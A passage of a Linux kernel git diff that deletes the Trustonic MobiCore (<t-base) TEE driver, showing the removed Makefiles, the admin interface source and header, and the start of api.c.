-@@ -1,6 +0,0 @@
--#
--# Makefile for the <t-base core and trusted UI drivers
--#
--
--obj-$(CONFIG_MOBICORE_DRIVER) := MobiCoreDriver/
--
-diff --git a/drivers/gud/MobiCoreDriver/Makefile b/drivers/gud/MobiCoreDriver/Makefile
-deleted file mode 100644
-index 4837359674f69..0000000000000
---- a/drivers/gud/MobiCoreDriver/Makefile
-+++ /dev/null
-@@ -1,33 +0,0 @@
--#
--# Makefile for the <t-base core driver
--#
--
--GUD_ROOT_FOLDER := drivers/gud/
--
--# add our modules to kernel.
--obj-$(CONFIG_MOBICORE_DRIVER) += mcDrvModule.o
--
--mcDrvModule-y := \
--	admin.o \
--	api.o \
--	client.o \
--	clientlib.o \
--	clock.o \
--	fastcall.o \
--	logging.o \
--	main.o \
--	mcp.o \
--	mmu.o \
--	pm.o \
--	scheduler.o \
--	session.o
--
--# Release mode by default
--ccflags-y += -DNDEBUG
--ccflags-y += -Wno-declaration-after-statement
--
--ccflags-$(CONFIG_MOBICORE_DEBUG) += -DDEBUG
--
--# MobiCore Driver includes
--ccflags-y += -I$(GUD_ROOT_FOLDER)/MobiCoreDriver
--
-diff --git a/drivers/gud/MobiCoreDriver/admin.c b/drivers/gud/MobiCoreDriver/admin.c
-deleted file mode 100644
-index 0d8fef4df84a8..0000000000000
---- a/drivers/gud/MobiCoreDriver/admin.c
-+++ /dev/null
-@@ -1,1011 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <asm/atomic.h>
--#include <linux/slab.h>
--#include <linux/device.h>
--#include <linux/mutex.h>
--#include <linux/cdev.h>
--#include <linux/fs.h>
--#include <linux/ioctl.h>
--#include <linux/uaccess.h>
--#include <linux/sched.h>
--#include <linux/completion.h>
--#include <linux/vmalloc.h>
--#include <linux/module.h>
--#include <linux/random.h>
--#include <linux/delay.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "mci/mcloadformat.h"
--
--#include "main.h"
--#include "debug.h"
--#include "mmu.h"	/* For load_check and load_token */
--#include "mcp.h"
--#include "client.h"
--#include "api.h"
--#include "admin.h"
--
--/* We need 2 devices for admin and user interface*/
--#define MC_DEV_MAX 2
--
--static struct admin_ctx {
--	struct device *dev;
--	atomic_t daemon_counter;
--	/* Define a MobiCore device structure for use with dev_debug() etc */
--	struct device_driver mc_dev_name;
--	dev_t mc_dev_admin;
--	struct cdev mc_admin_cdev;
--	int (*tee_start_cb)(void);
--} g_admin_ctx;
--
--static struct mc_admin_driver_request {
--	/* Global */
--	struct mutex mutex;		/* Protects access to this struct */
--	struct mutex states_mutex;	/* Protect access to the states */
--	enum client_state {
--		IDLE,
--		REQUEST_SENT,
--		BUFFERS_READY,
--	} client_state;
--	enum server_state {
--		NOT_CONNECTED,		/* Device not open */
--		READY,			/* Waiting for requests */
--		REQUEST_RECEIVED,	/* Got a request, is working */
--		RESPONSE_SENT,		/* Has sent a response header */
--		DATA_SENT,		/* Blocked until data is consumed */
--	} server_state;
--	/* Request */
--	uint32_t request_id;
--	struct mc_admin_request request;
--	struct completion client_complete;
--	/* Response */
--	struct mc_admin_response response;
--	struct completion server_complete;
--	void *buffer;			/* Reception buffer (pre-allocated) */
--	size_t size;			/* Size of the reception buffer */
--} g_request;
--
--static struct tbase_object *tbase_object_alloc(bool is_sp_trustlet,
--					       size_t length)
--{
--	struct tbase_object *obj;
--	size_t size = sizeof(*obj) + length;
--	size_t header_length = 0;
--
--	/* Determine required size */
--	if (is_sp_trustlet) {
--		/* Need space for lengths info and containers */
--		header_length = sizeof(struct mc_blob_len_info);
--		size += header_length + 3 * MAX_SO_CONT_SIZE;
--	}
--
--	/* Allocate memory */
--	obj = vzalloc(size);
--	if (!obj)
--		return NULL;
--
--	/* A non-zero header_length indicates that we have a SP trustlet */
--	obj->header_length = header_length;
--	obj->length = length;
--	return obj;
--}
--
--void tbase_object_free(struct tbase_object *robj)
--{
--	vfree(robj);
--}
--
--static inline void client_state_change(enum client_state state)
--{
--	mutex_lock(&g_request.states_mutex);
--	g_request.client_state = state;
--	mutex_unlock(&g_request.states_mutex);
--}
--
--static inline bool client_state_is(enum client_state state)
--{
--	bool is;
--
--	mutex_lock(&g_request.states_mutex);
--	is = g_request.client_state == state;
--	mutex_unlock(&g_request.states_mutex);
--	return is;
--}
--
--static inline void server_state_change(enum server_state state)
--{
--	mutex_lock(&g_request.states_mutex);
--	g_request.server_state = state;
--	mutex_unlock(&g_request.states_mutex);
--}
--
--static inline bool server_state_is(enum server_state state)
--{
--	bool is;
--
--	mutex_lock(&g_request.states_mutex);
--	is = g_request.server_state == state;
--	mutex_unlock(&g_request.states_mutex);
--	return is;
--}
--
--static void request_cancel(void);
--
--static int request_send(uint32_t command, const struct mc_uuid_t *uuid,
--			uint32_t is_gp, uint32_t spid)
--{
--	struct device *dev = g_admin_ctx.dev;
--	int counter = 10;
--	int ret;
--
--	/* Prepare request */
--	mutex_lock(&g_request.states_mutex);
--	/* Wait a little for daemon to connect */
--	while ((g_request.server_state == NOT_CONNECTED) && counter--) {
--		mutex_unlock(&g_request.states_mutex);
--		ssleep(1);
--		mutex_lock(&g_request.states_mutex);
--	}
--
--	BUG_ON(g_request.client_state != IDLE);
--	if (g_request.server_state != READY) {
--		mutex_unlock(&g_request.states_mutex);
--		if (g_request.server_state != NOT_CONNECTED) {
--			/* TODO: can we recover? */
--			dev_err(dev, "%s: invalid daemon state %d\n", __func__,
--				g_request.server_state);
--			ret = -EPROTO;
--			goto end;
--		} else {
--			dev_err(dev, "%s: daemon not connected\n", __func__);
--			ret = -ENOTCONN;
--			goto end;
--		}
--	}
--
--	memset(&g_request.request, 0, sizeof(g_request.request));
--	memset(&g_request.response, 0, sizeof(g_request.response));
--	g_request.request.request_id = g_request.request_id++;
--	g_request.request.command = command;
--	if (uuid)
--		memcpy(&g_request.request.uuid, uuid, sizeof(*uuid));
--	else
--		memset(&g_request.request.uuid, 0, sizeof(*uuid));
--
--	g_request.request.is_gp = is_gp;
--	g_request.request.spid = spid;
--	g_request.client_state = REQUEST_SENT;
--	mutex_unlock(&g_request.states_mutex);
--
--	/* Send request */
--	complete(&g_request.client_complete);
--
--	/* Wait for header (could be interruptible, but then needs more work) */
--	wait_for_completion(&g_request.server_complete);
--
--	/* Server should be waiting with some data for us */
--	mutex_lock(&g_request.states_mutex);
--	switch (g_request.server_state) {
--	case NOT_CONNECTED:
--		/* Daemon gone */
--		ret = -EPIPE;
--		break;
--	case READY:
--		/* No data to come, likely an error */
--		ret = -g_request.response.error_no;
--		break;
--	case RESPONSE_SENT:
--	case DATA_SENT:
--		/* Normal case, data to come */
--		ret = 0;
--		break;
--	default:
--		/* Should not happen as complete means the state changed */
--		dev_err(dev, "%s: daemon is in a bad state: %d\n", __func__,
--			g_request.server_state);
--		ret = -EPIPE;
--		break;
--	}
--
--	mutex_unlock(&g_request.states_mutex);
--
--end:
--	if (ret)
--		request_cancel();
--
--	return ret;
--}
--
--static int request_receive(void *address, uint32_t size)
--{
--	/*
--	 * At this point we have received the header and prepared some buffers
--	 * to receive data that we know are coming from the server.
--	 */
--
--	/* Check server state */
--	bool server_ok;
--
--	mutex_lock(&g_request.states_mutex);
--	server_ok = (g_request.server_state == RESPONSE_SENT) ||
--		    (g_request.server_state == DATA_SENT);
--	mutex_unlock(&g_request.states_mutex);
--	if (!server_ok) {
--		/* TODO: can we recover? */
--		request_cancel();
--		return -EPIPE;
--	}
--
--	/* Setup reception buffer */
--	g_request.buffer = address;
--	g_request.size = size;
--	client_state_change(BUFFERS_READY);
--
--	/* Unlock write of data */
--	complete(&g_request.client_complete);
--
--	/* Wait for data (far too late to be interruptible) */
--	wait_for_completion(&g_request.server_complete);
--
--	/* Reset reception buffer */
--	g_request.buffer = NULL;
--	g_request.size = 0;
--
--	/* Return to idle state */
--	client_state_change(IDLE);
--	return 0;
--}
--
--/* Must be called instead of request_receive() to cancel a pending request */
--static void request_cancel(void)
--{
--	/* Unlock write of data */
--	mutex_lock(&g_request.states_mutex);
--	if (g_request.server_state == DATA_SENT)
--		complete(&g_request.client_complete);
--
--	/* Return to idle state */
--	g_request.client_state = IDLE;
--	mutex_unlock(&g_request.states_mutex);
--}
--
--static int admin_get_root_container(void *address)
--{
--	struct device *dev = g_admin_ctx.dev;
--	int ret = 0;
--
--	/* Lock communication channel */
--	mutex_lock(&g_request.mutex);
--
--	/* Send request and wait for header */
--	ret = request_send(MC_DRV_GET_ROOT_CONTAINER, 0, 0, 0);
--	if (ret)
--		goto end;
--
--	/* Check length against max */
--	if (g_request.response.length >= MAX_SO_CONT_SIZE) {
--		request_cancel();
--		dev_err(dev, "%s: response length exceeds maximum\n", __func__);
--		ret = EREMOTEIO;
--		goto end;
--	}
--
--	/* Get data */
--	ret = request_receive(address, g_request.response.length);
--	if (!ret)
--		ret = g_request.response.length;
--
--end:
--	mutex_unlock(&g_request.mutex);
--	return ret;
--}
--
--static int admin_get_sp_container(void *address, uint32_t spid)
--{
--	struct device *dev = g_admin_ctx.dev;
--	int ret = 0;
--
--	/* Lock communication channel */
--	mutex_lock(&g_request.mutex);
--
--	/* Send request and wait for header */
--	ret = request_send(MC_DRV_GET_SP_CONTAINER, 0, 0, spid);
--	if (ret)
--		goto end;
--
--	/* Check length against max */
--	if (g_request.response.length >= MAX_SO_CONT_SIZE) {
--		request_cancel();
--		dev_err(dev, "%s: response length exceeds maximum\n", __func__);
--		ret = EREMOTEIO;
--		goto end;
--	}
--
--	/* Get data */
--	ret = request_receive(address, g_request.response.length);
--	if (!ret)
--		ret = g_request.response.length;
--
--end:
--	mutex_unlock(&g_request.mutex);
--	return ret;
--}
--
--static int admin_get_trustlet_container(void *address,
--					const struct mc_uuid_t *uuid,
--					uint32_t spid)
--{
--	struct device *dev = g_admin_ctx.dev;
--	int ret = 0;
--
--	/* Lock communication channel */
--	mutex_lock(&g_request.mutex);
--
--	/* Send request and wait for header */
--	ret = request_send(MC_DRV_GET_TRUSTLET_CONTAINER, uuid, 0, spid);
--	if (ret)
--		goto end;
--
--	/* Check length against max */
--	if (g_request.response.length >= MAX_SO_CONT_SIZE) {
--		request_cancel();
--		dev_err(dev, "%s: response length exceeds maximum\n", __func__);
--		ret = EREMOTEIO;
--		goto end;
--	}
--
--	/* Get data */
--	ret = request_receive(address, g_request.response.length);
--	if (!ret)
--		ret = g_request.response.length;
--
--end:
--	mutex_unlock(&g_request.mutex);
--	return ret;
--}
--
--static struct tbase_object *admin_get_trustlet(const struct mc_uuid_t *uuid,
--					       uint32_t is_gp, uint32_t *spid)
--{
--	struct tbase_object *obj = NULL;
--	bool is_sp_tl;
--	int ret = 0;
--
--	/* Lock communication channel */
--	mutex_lock(&g_request.mutex);
--
--	/* Send request and wait for header */
--	ret = request_send(MC_DRV_GET_TRUSTLET, uuid, is_gp, 0);
--	if (ret)
--		goto end;
--
--	/* Allocate memory */
--	is_sp_tl = g_request.response.service_type == SERVICE_TYPE_SP_TRUSTLET;
--	obj = tbase_object_alloc(is_sp_tl, g_request.response.length);
--	if (!obj) {
--		request_cancel();
--		ret = -ENOMEM;
--		goto end;
--	}
--
--	/* Get data */
--	ret = request_receive(&obj->data[obj->header_length], obj->length);
--	*spid = g_request.response.spid;
--
--end:
--	mutex_unlock(&g_request.mutex);
--	if (ret)
--		return ERR_PTR(ret);
--
--	return obj;
--}
--
--static void mc_admin_sendcrashdump(void)
--{
--	int ret = 0;
--
--	/* Lock communication channel */
--	mutex_lock(&g_request.mutex);
--
--	/* Send request and wait for header */
--	ret = request_send(MC_DRV_SIGNAL_CRASH, NULL, false, 0);
--	if (ret)
--		goto end;
--
--	/* Done */
--	request_cancel();
--
--end:
--	mutex_unlock(&g_request.mutex);
--}
--
--static int tbase_object_make(uint32_t spid, struct tbase_object *obj)
--{
--	struct mc_blob_len_info *l_info = (struct mc_blob_len_info *)obj->data;
--	uint8_t *address = &obj->data[obj->header_length + obj->length];
--	struct mclf_header_v2 *thdr;
--	int ret;
--
--	/* Get root container */
--	ret = admin_get_root_container(address);
--	if (ret < 0)
--		goto err;
--
--	l_info->root_size = ret;
--	address += ret;
--
--	/* Get SP container */
--	ret = admin_get_sp_container(address, spid);
--	if (ret < 0)
--		goto err;
--
--	l_info->sp_size = ret;
--	address += ret;
--
--	/* Get trustlet container */
--	thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length];
--	ret = admin_get_trustlet_container(address, &thdr->uuid, spid);
--	if (ret < 0)
--		goto err;
--
--	l_info->ta_size = ret;
--	address += ret;
--
--	/* Setup lengths information */
--	l_info->magic = MC_TLBLOBLEN_MAGIC;
--	obj->length += sizeof(*l_info);
--	obj->length += l_info->root_size + l_info->sp_size + l_info->ta_size;
--	ret = 0;
--
--err:
--	return ret;
--}
--
--struct tbase_object *tbase_object_read(uint32_t spid, uintptr_t address,
--				       size_t length)
--{
--	struct device *dev = g_admin_ctx.dev;
--	char __user *addr = (char __user *)address;
--	struct tbase_object *obj;
--	uint8_t *data;
--	struct mclf_header_v2 thdr;
--	int ret;
--
--	/* Check length */
--	if (length < sizeof(thdr)) {
--		dev_err(dev, "%s: buffer shorter than header size\n", __func__);
--		return ERR_PTR(-EFAULT);
--	}
--
--	/* Read header */
--	if (copy_from_user(&thdr, addr, sizeof(thdr))) {
--		dev_err(dev, "%s: header: copy_from_user failed\n", __func__);
--		return ERR_PTR(-EFAULT);
--	}
--
--	/* Allocate memory */
--	obj = tbase_object_alloc(thdr.service_type == SERVICE_TYPE_SP_TRUSTLET,
--				 length);
--	if (!obj)
--		return ERR_PTR(-ENOMEM);
--
--	/* Copy header */
--	data = &obj->data[obj->header_length];
--	memcpy(data, &thdr, sizeof(thdr));
--	/* Copy the rest of the data */
--	data += sizeof(thdr);
--	if (copy_from_user(data, &addr[sizeof(thdr)], length - sizeof(thdr))) {
--		dev_err(dev, "%s: data: copy_from_user failed\n", __func__);
--		vfree(obj);
--		return ERR_PTR(-EFAULT);
--	}
--
--	if (obj->header_length) {
--		ret = tbase_object_make(spid, obj);
--		if (ret) {
--			vfree(obj);
--			return ERR_PTR(ret);
--		}
--	}
--
--	return obj;
--}
--
--struct tbase_object *tbase_object_select(const struct mc_uuid_t *uuid)
--{
--	struct tbase_object *obj;
--	struct mclf_header_v2 *thdr;
--
--	obj = tbase_object_alloc(false, sizeof(*thdr));
--	if (!obj)
--		return ERR_PTR(-ENOMEM);
--
--	thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length];
--	memcpy(&thdr->uuid, uuid, sizeof(thdr->uuid));
--	return obj;
--}
--
--struct tbase_object *tbase_object_get(const struct mc_uuid_t *uuid,
--				      uint32_t is_gp_uuid)
--{
--	struct tbase_object *obj;
--	uint32_t spid = 0;
--
--	/* admin_get_trustlet creates the right object based on service type */
--	obj = admin_get_trustlet(uuid, is_gp_uuid, &spid);
--	if (IS_ERR(obj))
--		return obj;
--
--	/* SP trustlet: create full secure object with all containers */
--	if (obj->header_length) {
--		int ret;
--
--		/* Do not return EINVAL in this case as SPID was not found */
--		if (!spid) {
--			vfree(obj);
--			return ERR_PTR(-ENOENT);
--		}
--
--		ret = tbase_object_make(spid, obj);
--		if (ret) {
--			vfree(obj);
--			return ERR_PTR(ret);
--		}
--	}
--
--	return obj;
--}
--
--static inline int load_driver(struct tbase_client *client,
--			      struct mc_admin_load_info *info)
--{
--	struct tbase_object *obj;
--	struct mclf_header_v2 *thdr;
--	struct mc_identity identity = {
--		.login_type = TEEC_LOGIN_PUBLIC,
--	};
--	uintptr_t dci = 0;
--	uint32_t dci_len = 0;
--	uint32_t sid;
--	int ret;
--
--	obj = tbase_object_read(info->spid, info->address, info->length);
--	if (IS_ERR(obj))
--		return PTR_ERR(obj);
--
--	thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length];
--	if (!(thdr->flags & MC_SERVICE_HEADER_FLAGS_NO_CONTROL_INTERFACE)) {
--		/*
--		 * The driver requires a DCI, although we won't be able to use
--		 * it to communicate.
--		 */
--		dci_len = PAGE_SIZE;
--		ret = api_malloc_cbuf(client, dci_len, &dci, NULL);
--		if (ret)
--			goto end;
--	}
--
--	/* Open session */
--	ret = client_add_session(client, obj, dci, dci_len, &sid, false,
--				 &identity);
--	if (ret)
--		api_free_cbuf(client, dci);
--	else
--		dev_dbg(g_admin_ctx.dev, "driver loaded with sid %x", sid);
--
--end:
--	vfree(obj);
--	return ret;
--}
--
--static inline int load_token(struct mc_admin_load_info *token)
--{
--	struct tbase_mmu *mmu;
--	struct mcp_buffer_map map;
--	int ret;
--
--	mmu = tbase_mmu_create(current, (void *)(uintptr_t)token->address,
--			       token->length);
--	if (IS_ERR(mmu))
--		return PTR_ERR(mmu);
--
--	tbase_mmu_buffer(mmu, &map);
--	ret = mcp_load_token(token->address, &map);
--	tbase_mmu_delete(mmu);
--	return ret;
--}
--
--static inline int load_check(struct mc_admin_load_info *info)
--{
--	struct tbase_object *obj;
--	struct tbase_mmu *mmu;
--	struct mcp_buffer_map map;
--	int ret;
--
--	obj = tbase_object_read(info->spid, info->address, info->length);
--	if (IS_ERR(obj))
--		return PTR_ERR(obj);
--
--	mmu = tbase_mmu_create(NULL, obj->data, obj->length);
--	if (IS_ERR(mmu))
--		return PTR_ERR(mmu);
--
--	tbase_mmu_buffer(mmu, &map);
--	ret = mcp_load_check(obj, &map);
--	tbase_mmu_delete(mmu);
--	return ret;
--}
--
--static ssize_t admin_write(struct file *file, const char __user *user,
--			   size_t len, loff_t *off)
--{
--	int ret;
--
--	/* No offset allowed [yet] */
--	if (*off) {
--		g_request.response.error_no = EPIPE;
--		ret = -ECOMM;
--		goto err;
--	}
--
--	if (server_state_is(REQUEST_RECEIVED)) {
--		/* Check client state */
--		if (!client_state_is(REQUEST_SENT)) {
--			g_request.response.error_no = EPIPE;
--			ret = -EPIPE;
--			goto err;
--		}
--
--		/* Receive response header */
--		if (copy_from_user(&g_request.response, user,
--				   sizeof(g_request.response))) {
--			g_request.response.error_no = EPIPE;
--			ret = -ECOMM;
--			goto err;
--		}
--
--		/* Check request ID */
--		if (g_request.request.request_id !=
--						g_request.response.request_id) {
--			g_request.response.error_no = EPIPE;
--			ret = -EBADE;
--			goto err;
--		}
--
--		/* Response header is acceptable */
--		ret = sizeof(g_request.response);
--		if (g_request.response.length)
--			server_state_change(RESPONSE_SENT);
--		else
--			server_state_change(READY);
--
--		goto end;
--	} else if (server_state_is(RESPONSE_SENT)) {
--		/* Server is waiting */
--		server_state_change(DATA_SENT);
--
--		/* Get data */
--		ret = wait_for_completion_interruptible(
--						&g_request.client_complete);
--
--		/* Server received a signal, let see if it tries again */
--		if (ret) {
--			server_state_change(RESPONSE_SENT);
--			return ret;
--		}
--
--		/* Check client state */
--		if (!client_state_is(BUFFERS_READY)) {
--			g_request.response.error_no = EPIPE;
--			ret = -EPIPE;
--			goto err;
--		}
--
--		/* TODO deal with several writes */
--		if (len != g_request.size)
--			len = g_request.size;
--
--		ret = copy_from_user(g_request.buffer, user, len);
--		if (ret) {
--			g_request.response.error_no = EPIPE;
--			ret = -ECOMM;
--			goto err;
--		}
--
--		ret = len;
--		server_state_change(READY);
--		goto end;
--	} else {
--		ret = -ECOMM;
--		goto err;
--	}
--
--err:
--	server_state_change(READY);
--end:
--	complete(&g_request.server_complete);
--	return ret;
--}
--
--static long admin_ioctl(struct file *file, unsigned int cmd,
--			unsigned long arg)
--{
--	struct tbase_client *client = file->private_data;
--	void __user *uarg = (void __user *)arg;
--	int ret = -EINVAL;
--
--	MCDRV_DBG("%u from %s", _IOC_NR(cmd), current->comm);
--
--	if (WARN(!client, "No client data available"))
--		return -EFAULT;
--
--	switch (cmd) {
--	case MC_ADMIN_IO_GET_DRIVER_REQUEST: {
--		/* Block until a request is available */
--		ret = wait_for_completion_interruptible(
--						&g_request.client_complete);
--		if (ret)
--			/* Interrupted by signal */
--			break;
--
--		/* Check client state */
--		if (!client_state_is(REQUEST_SENT)) {
--			g_request.response.error_no = EPIPE;
--			complete(&g_request.server_complete);
--			ret = -EPIPE;
--			break;
--		}
--
--		/* Send request (the driver request mutex is held) */
--		ret = copy_to_user(uarg, &g_request.request,
--				   sizeof(g_request.request));
--		if (ret) {
--			server_state_change(READY);
--			complete(&g_request.server_complete);
--			ret = -EPROTO;
--			break;
--		}
--
--		server_state_change(REQUEST_RECEIVED);
--		break;
--	}
--	case MC_ADMIN_IO_GET_INFO: {
--		struct mc_admin_driver_info info;
--
--		info.drv_version = MC_VERSION(MCDRVMODULEAPI_VERSION_MAJOR,
--					      MCDRVMODULEAPI_VERSION_MINOR);
--		info.initial_cmd_id = g_request.request_id;
--		ret = copy_to_user(uarg, &info, sizeof(info));
--		break;
--	}
--	case MC_ADMIN_IO_LOAD_DRIVER: {
--		struct mc_admin_load_info info;
--
--		ret = copy_from_user(&info, uarg, sizeof(info));
--		if (ret)
--			ret = -EFAULT;
--		else
--			ret = load_driver(client, &info);
--
--		break;
--	}
--	case MC_ADMIN_IO_LOAD_TOKEN: {
--		struct mc_admin_load_info info;
--
--		ret = copy_from_user(&info, uarg, sizeof(info));
--		if (ret)
--			ret = -EFAULT;
--		else
--			ret = load_token(&info);
--
--		break;
--	}
--	case MC_ADMIN_IO_LOAD_CHECK: {
--		struct mc_admin_load_info info;
--
--		ret = copy_from_user(&info, uarg, sizeof(info));
--		if (ret)
--			ret = -EFAULT;
--		else
--			ret = load_check(&info);
--
--		break;
--	}
--	default:
--		ret = -ENOIOCTLCMD;
--	}
--
--	return ret;
--}
--
--/*
-- * mc_fd_release() - This function will be called from user space as close(...)
-- * The client data are freed and the associated memory pages are unreserved.
-- *
-- * @inode
-- * @file
-- *
-- * Returns 0
-- */
--static int admin_release(struct inode *inode, struct file *file)
--{
--	struct tbase_client *client = file->private_data;
--	struct device *dev = g_admin_ctx.dev;
--
--	if (!client)
--		return -EPROTO;
--
--	api_close_device(client);
--	file->private_data = NULL;
--
--	/* Requests from driver to daemon */
--	mutex_lock(&g_request.states_mutex);
--	dev_warn(dev, "%s: daemon disconnected\n", __func__);
--	g_request.server_state = NOT_CONNECTED;
--	/* A non-zero command indicates that a thread is waiting */
--	if (g_request.client_state != IDLE) {
--		g_request.response.error_no = ESHUTDOWN;
--		complete(&g_request.server_complete);
--	}
--
--	mutex_unlock(&g_request.states_mutex);
--	atomic_set(&g_admin_ctx.daemon_counter, 0);
--	/*
--	 * ret is quite irrelevant here as most apps don't care about the
--	 * return value from close() and it's quite difficult to recover
--	 */
--	return 0;
--}
--
--static int admin_open(struct inode *inode, struct file *file)
--{
--	struct device *dev = g_admin_ctx.dev;
--	struct tbase_client *client;
--	int err;
--
--	/*
--	 * If the daemon is already set we can't allow anybody else to open
--	 * the admin interface.
--	 */
--	if (atomic_cmpxchg(&g_admin_ctx.daemon_counter, 0, 1) != 0) {
--		MCDRV_ERROR("Daemon is already connected");
--		return -EPROTO;
--	}
--
--	/* Any value will do */
--	g_request.request_id = 42;
--
--	/* Setup the usual variables */
--	MCDRV_DBG("accept %s as tbase daemon", current->comm);
--
--	/*
--	* daemon is connected so now we can safely suppose
--	* the secure world is loaded too
--	*/
--	if (!IS_ERR_OR_NULL(g_admin_ctx.tee_start_cb))
--		g_admin_ctx.tee_start_cb = ERR_PTR(g_admin_ctx.tee_start_cb());
--	if (IS_ERR(g_admin_ctx.tee_start_cb)) {
--		MCDRV_ERROR("Failed initializing the SW");
--		err = PTR_ERR(g_admin_ctx.tee_start_cb);
--		goto fail_connection;
--}
--
--	/* Create client */
--	client = api_open_device(true);
--	if (!client) {
--		err = -ENOMEM;
--		goto fail_connection;
--	}
--
--	/* Store client in user file */
--	file->private_data = client;
--
--	/* Requests from driver to daemon */
--	server_state_change(READY);
--	dev_info(dev, "%s: daemon connected\n", __func__);
--
--	return 0;
--
--fail_connection:
--	atomic_set(&g_admin_ctx.daemon_counter, 0);
--	return err;
--}
--
--/* function table structure of this device driver. */
--static const struct file_operations mc_admin_fops = {
--	.owner = THIS_MODULE,
--	.open = admin_open,
--	.release = admin_release,
--	.unlocked_ioctl = admin_ioctl,
--#ifdef CONFIG_COMPAT
--	.compat_ioctl = admin_ioctl,
--#endif
--	.write = admin_write,
--};
--
--int mc_admin_init(struct class *mc_device_class, dev_t *out_dev,
--		  int (*tee_start_cb)(void))
--{
--	int err = 0;
--
--	if (!out_dev || !mc_device_class)
--		return -EINVAL;
--
--	atomic_set(&g_admin_ctx.daemon_counter, 0);
--
--	/* Requests from driver to daemon */
--	mutex_init(&g_request.mutex);
--	mutex_init(&g_request.states_mutex);
--	init_completion(&g_request.client_complete);
--	init_completion(&g_request.server_complete);
--	mcp_register_crashhandler(mc_admin_sendcrashdump);
--
--	/* Create char device */
--	cdev_init(&g_admin_ctx.mc_admin_cdev, &mc_admin_fops);
--	err = alloc_chrdev_region(&g_admin_ctx.mc_dev_admin, 0, MC_DEV_MAX,
--				  "trustonic_tee");
--	if (err < 0) {
--		MCDRV_ERROR("failed to allocate char dev region");
--		goto fail_alloc_chrdev_region;
--	}
--
--	err = cdev_add(&g_admin_ctx.mc_admin_cdev, g_admin_ctx.mc_dev_admin, 1);
--	if (err) {
--		MCDRV_ERROR("admin device register failed");
--		goto fail_cdev_add;
--	}
--
--	g_admin_ctx.mc_admin_cdev.owner = THIS_MODULE;
--	g_admin_ctx.dev = device_create(mc_device_class, NULL,
--					g_admin_ctx.mc_dev_admin, NULL,
--					MC_ADMIN_DEVNODE);
--	if (IS_ERR(g_admin_ctx.dev)) {
--		err = PTR_ERR(g_admin_ctx.dev);
--		goto fail_dev_create;
--	}
--
--	g_admin_ctx.mc_dev_name.name = "<t-base";
--	g_admin_ctx.dev->driver = &g_admin_ctx.mc_dev_name;
--	*out_dev = g_admin_ctx.mc_dev_admin;
--
--	/* Register the call back for starting the secure world */
--	g_admin_ctx.tee_start_cb = tee_start_cb;
--
--	MCDRV_DBG("done");
--	return 0;
--
--fail_dev_create:
--	cdev_del(&g_admin_ctx.mc_admin_cdev);
--
--fail_cdev_add:
--	unregister_chrdev_region(g_admin_ctx.mc_dev_admin, MC_DEV_MAX);
--
--fail_alloc_chrdev_region:
--	MCDRV_ERROR("fail with %d", err);
--	return err;
--}
--
--void mc_admin_exit(struct class *mc_device_class)
--{
--	device_destroy(mc_device_class, g_admin_ctx.mc_dev_admin);
--	cdev_del(&g_admin_ctx.mc_admin_cdev);
--	unregister_chrdev_region(g_admin_ctx.mc_dev_admin, MC_DEV_MAX);
--	/* Requests from driver to daemon */
--	mutex_destroy(&g_request.states_mutex);
--	MCDRV_DBG("done");
--}
-diff --git a/drivers/gud/MobiCoreDriver/admin.h b/drivers/gud/MobiCoreDriver/admin.h
-deleted file mode 100644
-index 5a78d943752da..0000000000000
---- a/drivers/gud/MobiCoreDriver/admin.h
-+++ /dev/null
-@@ -1,32 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef ADMIN_FD_H_
--#define ADMIN_FD_H_
--
--struct mc_uuid_t;
--struct tbase_object;
--
--int mc_admin_init(struct class *mc_device_class, dev_t *out_dev,
--		  int (*tee_start_cb)(void));
--void mc_admin_exit(struct class *mc_device_class);
--
--struct tbase_object *tbase_object_select(const struct mc_uuid_t *uuid);
--struct tbase_object *tbase_object_get(const struct mc_uuid_t *uuid,
--				      uint32_t is_gp_uuid);
--struct tbase_object *tbase_object_read(uint32_t spid, uintptr_t address,
--				       size_t length);
--void tbase_object_free(struct tbase_object *out_robj);
--
--#endif /* ADMIN_FD_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/api.c b/drivers/gud/MobiCoreDriver/api.c
-deleted file mode 100644
-index 0d2abaf617aea..0000000000000
---- a/drivers/gud/MobiCoreDriver/api.c
-+++ /dev/null
-@@ -1,419 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/device.h>
--#include <linux/slab.h>
--#include <linux/err.h>
--#include <linux/cred.h>
--#include <linux/sched.h>
--
--#include <public/mc_linux.h>	/* MC_MAP_MAX */
--#include "main.h"
--#include "debug.h"
--#include "mcp.h"
--#include "admin.h"
--#include "session.h"
--#include "client.h"
--#include "api.h"
--
--static struct api_ctx {
--	struct mutex		clients_lock;	/* Clients list + temp notifs */
--	struct list_head	clients;	/* List of user-space clients */
--} api_ctx;
--
--/*
-- * Initialize a new tbase client object
-- * @return client pointer or NULL if no allocation was possible.
-- */
--struct tbase_client *api_open_device(bool is_from_kernel)
--{
--	struct tbase_client *client;
--
--	/* Allocate and init client object */
--	client = client_create(is_from_kernel);
--	if (!client) {
